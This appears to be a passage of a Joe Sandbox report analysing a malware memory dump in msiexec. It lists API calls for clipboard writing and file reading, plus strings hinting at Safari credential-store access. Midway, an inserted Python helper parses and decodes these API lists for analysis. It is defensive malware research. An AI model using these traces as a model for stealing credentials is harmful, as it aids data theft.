                                                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                            • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004095FC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3655998216-0
                                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00445426
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                            • String ID:
                                                                                            • API String ID: 1828521557-0
                                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID:
                                                                                            • API String ID: 2081463915-0
                                                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                            APIs
                                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 2136311172-0
                                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                            APIs
                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@
                                                                                            • String ID:
                                                                                            • API String ID: 1936579350-0
                                                                                            • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                            • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                            APIs
                                                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                            • GetLastError.KERNEL32 ref: 00409974
                                                                                            • CloseClipboard.USER32 ref: 0040997D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3604893535-0
                                                                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
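The API list of the entry above (EmptyClipboard, CreateFileW in a subcall, GetFileSize, GlobalAlloc, GlobalLock, ReadFile, GlobalUnlock, SetClipboardData with format 0x0000000D) is the raw material an analyst turns into a behaviour statement: the function reads a file into a global buffer and hands it to the clipboard as CF_UNICODETEXT. The following Python is an added example, not Joe Sandbox tooling or code from the report: it parses the "• Api.MODULE(args), ref: ADDR" lines in the format shown on this page and decodes the documented Win32 constants in their arguments. SAMPLE is copied verbatim from the entry above; the parser, the decoder table and the helper names are this example's own, and the argument values are the report's own static guesses ("?" marks an unresolved value), so the decoding is only as reliable as those guesses.

```python
"""Parse the "APIs" list of a Joe Sandbox function entry and decode well-known
Win32 argument constants so the observed call sequence reads as behaviour.
Example code, not part of the report; SAMPLE is copied from the clipboard
function entry, the rest is this example's own."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalLock.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnlock.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• GetLastError.KERNEL32 ref: 0040995D
• CloseHandle.KERNEL32(?), ref: 00409969
• GetLastError.KERNEL32 ref: 00409974
• CloseClipboard.USER32 ref: 0040997D
"""

# One call line; "Part of subcall function ADDR:" marks a call made by a callee.
_CALL = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^\s(]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX = re.compile(r"^-?[0-9A-Fa-f]{8}$")   # the report prints args as 8 hex digits

@dataclass
class Call:
    api: str
    module: str
    ref: int                                   # call site in the dump
    args: list = field(default_factory=list)   # raw strings; '?' = unresolved
    subcall_of: Optional[int] = None           # callee address if indirect
    decoded: dict = field(default_factory=dict)

# (api, argument index) -> (label, constant table, mode). mode "bits" splits a
# flag word; an int is a mask applied before an exact lookup. Values are the
# documented SDK constants (winuser.h, winbase.h, winnt.h).
_DECODERS = {
    ("SetClipboardData", 0): ("format", {1: "CF_TEXT", 2: "CF_BITMAP", 8: "CF_DIB", 13: "CF_UNICODETEXT"}, 0xFFFFFFFF),
    ("CreateFileW", 1): ("access", {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}, "bits"),
    ("CreateFileW", 2): ("share", {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}, "bits"),
    ("CreateFileW", 4): ("disposition", {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}, 0xFFFFFFFF),
    ("GlobalAlloc", 0): ("flags", {0x2: "GMEM_MOVEABLE", 0x40: "GMEM_ZEROINIT", 0x2000: "GMEM_SHARE"}, "bits"),
    ("FormatMessageW", 0): ("flags", {0x100: "FORMAT_MESSAGE_ALLOCATE_BUFFER", 0x200: "FORMAT_MESSAGE_IGNORE_INSERTS",
                                      0x1000: "FORMAT_MESSAGE_FROM_SYSTEM"}, "bits"),
    ("MessageBoxW", 3): ("icon", {0x10: "MB_ICONERROR", 0x20: "MB_ICONQUESTION", 0x30: "MB_ICONWARNING",
                                  0x40: "MB_ICONINFORMATION"}, 0xF0),
    ("WideCharToMultiByte", 0): ("codepage", {0: "CP_ACP", 65001: "CP_UTF8"}, 0xFFFFFFFF),
}

def _decode(value, table, mode):
    if mode == "bits":
        names = [name for bit, name in table.items() if value & bit]
        rest = value & ~sum(table)             # bits with no name in the table
        if rest:
            names.append(f"0x{rest:X}")
        return "|".join(names) if names else "0"
    return table.get(value & mode, f"0x{value:X}")

def parse_calls(text):
    """Return the Call objects for every call line in a report 'APIs' list."""
    calls = []
    for line in text.splitlines():
        m = _CALL.match(line)
        if not m:
            continue                           # headers such as "APIs", "Strings"
        raw = m.group("args")
        # Naive split: a string argument containing a comma would be cut in two.
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        call = Call(m.group("api"), m.group("module"), int(m.group("ref"), 16), args, sub)
        for i, a in enumerate(args):
            if (call.api, i) in _DECODERS and _HEX.match(a):
                label, table, mode = _DECODERS[(call.api, i)]
                call.decoded[label] = _decode(int(a, 16), table, mode)
        calls.append(call)
    return calls

def describe(calls):
    """Render each call as Api(label=decoded, ...) plus its caller if indirect."""
    out = []
    for c in calls:
        inner = ", ".join(f"{k}={v}" for k, v in c.decoded.items())
        via = f" [via sub_{c.subcall_of:08X}]" if c.subcall_of is not None else ""
        out.append(f"{c.api}({inner}){via}")
    return out

def copies_file_to_clipboard(calls):
    """True when a file is opened and read before a text-format SetClipboardData:
    the shape of a clipboard-set routine fed from a file, as in the entry above."""
    seq = [c.api for c in calls]
    try:
        before = seq.index("ReadFile") < seq.index("SetClipboardData")
    except ValueError:
        return False
    text = any(c.decoded.get("format") in ("CF_TEXT", "CF_UNICODETEXT")
               for c in calls if c.api == "SetClipboardData")
    return "CreateFileW" in seq and before and text

if __name__ == "__main__":
    parsed = parse_calls(SAMPLE)
    for entry in describe(parsed):
        print(entry)
    print("file contents -> clipboard text:", copies_file_to_clipboard(parsed))
```

The decoder table only covers constants that appear in the entries on this page; extend it per API as needed, and keep the report's "?" placeholders as unknowns rather than guessing them. Treat the decoded sequence as a lead for dynamic confirmation (the sandbox's API trace of the injected msiexec process), since these argument values come from static analysis of the dump.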
                                                                                            APIs
                                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                            • API String ID: 2780580303-317687271
                                                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                            APIs
                                                                                            • EmptyClipboard.USER32 ref: 00409882
                                                                                            • wcslen.MSVCRT ref: 0040988F
                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                            • CloseClipboard.USER32 ref: 004098D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1213725291-0
                                                                                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                                                            • free.MSVCRT ref: 00418370
                                                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                            • String ID: OsError 0x%x (%u)
                                                                                            • API String ID: 2360000266-2664311388
                                                                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@memcpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 1865533344-0
                                                                                            • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                            • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                            • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                            • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                            APIs
                                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                            • memset.MSVCRT ref: 0040265F
                                                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                            • API String ID: 577499730-1134094380
                                                                                            • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                            • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
